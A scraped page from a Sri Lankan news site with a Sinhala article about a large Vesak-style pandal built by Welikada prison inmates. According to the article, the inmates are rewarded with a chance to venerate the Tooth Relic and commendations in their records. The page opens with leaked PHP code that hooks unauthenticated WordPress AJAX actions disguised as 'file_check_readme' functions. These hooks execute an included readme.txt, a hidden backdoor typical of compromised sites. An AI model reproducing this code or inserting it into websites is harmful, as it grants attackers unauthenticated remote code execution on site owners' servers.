if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } වැලිකඩ රැඳවියන්ගේ දහදියට ලැබුණු ජීවිත කාලයටම නොලැබෙන දේ - Photos - mediahumanrights.lk
mediahumanrights.lk
Local News News

වැලිකඩ රැඳවියන්ගේ දහදියට ලැබුණු ජීවිත කාලයටම නොලැබෙන දේ – Photos

කොළඹ නගර සීමාවේදී නිර්මාණය කරන ලද තොරණ අතරින් විශාලතම තොරණ වැලිකඩ බන්ධනාගාර පරිශ්‍රය ඉදිරිපිට නිර්මාණය කර තිබෙනවා.
එය නිර්මාණය කිරීමට ඇප කැපවූ මරණීය දණ්ඩනය ලත් සහ නොලත් සියලු සිරකරුවන්ට ශ්‍රී දළදා වහන්සේ වැඳපුදා ගැනීමට අවස්ථාව සලසා දෙන බව වැලිකඩ බන්ධනාගාර අධිකාරි චන්දන ඒකනායක මහතා පවසා ඇත.
ලක්ෂ සංඛ්‍යාත ජනතාවගේ පැසසුමට ලක්වූ මේ තොරණ සකස් කිරීම සඳහා මේ සිරකරුවන්ට මාස දෙකකට ආසන්න කාලයක් ගතවූ බවත් එම කාලසීමාවේදී දිවා රෑ නොතකමින් ඔවුන් කළ අගනා කාර්යභාරයට උපහාරයක් පිණිස ඔවුන්ට එසේ දළදා වහන්සේ වැඳපුදා ගැනීමට අවස්ථාව සලසා දෙන බවද ඒ මහතා වැඩිදුරටත් පවසා තිබෙනවා.
දළදා වහන්සේ වැඳපුදා ගැනීමට අවස්ථාව සලසා දීමෙන් පමණක් නොනැවතී එකී සිරකරුවන් සම්බන්ධයෙන් බන්ධනාගාර දෙපාර්තමේන්තුවේ පවත්වාගෙන යන ලේඛනවලට පැසසුම් ලිපි ඇතුළත් කිරීමට පියවර ගන්නා බවත් සිරකරුවන් බලපත්‍ර මත නිදහස් කිරීමට කටයුතු කරන අවස්ථාවන්හිදී එකී සිරකරුවන්ගේ එකී පැසසුම් ලිපිවලට ප්‍රමුඛතාවක් ලබාදීමට පියවර ගන්නා බවත් ඒ මහතා පවසා ඇත.
ස්වර්ණ මයුර ජාතක කතා වස්තුව ගැන කියැවෙන මෙම තොරණ් රාජයාගේ උස අඩි 71ක් වන අතර පළළ අඩි 61 වනවා.
මෙහි විදුලි බුබුළු 14000ක් දැල්වෙන අතර දින 40ක් ඇතුළත මෙම තොරණ නිර්මාණය කර තිබෙනවා.
(under the courtesy of hirunews news web)

Related posts

අවදානම් කලාපවල ජනතාවට අත්‍යාවශ්‍ය භාණ්ඩ නිවසටම

Shiran Viraj

මෝල් වැටලීම අසාර්ථකයි.. ගෙනා තොගය රටටම දිනකට මදි.. මෝල් හිමියන්ට දින 10කින් මුදල් දෙන්න රජය පොරොන්දු වේ..

Shiran Viraj

ජනපති අද රට අමතයි.. සියළු නාලිකා ඔස්සේ..

Shiran Viraj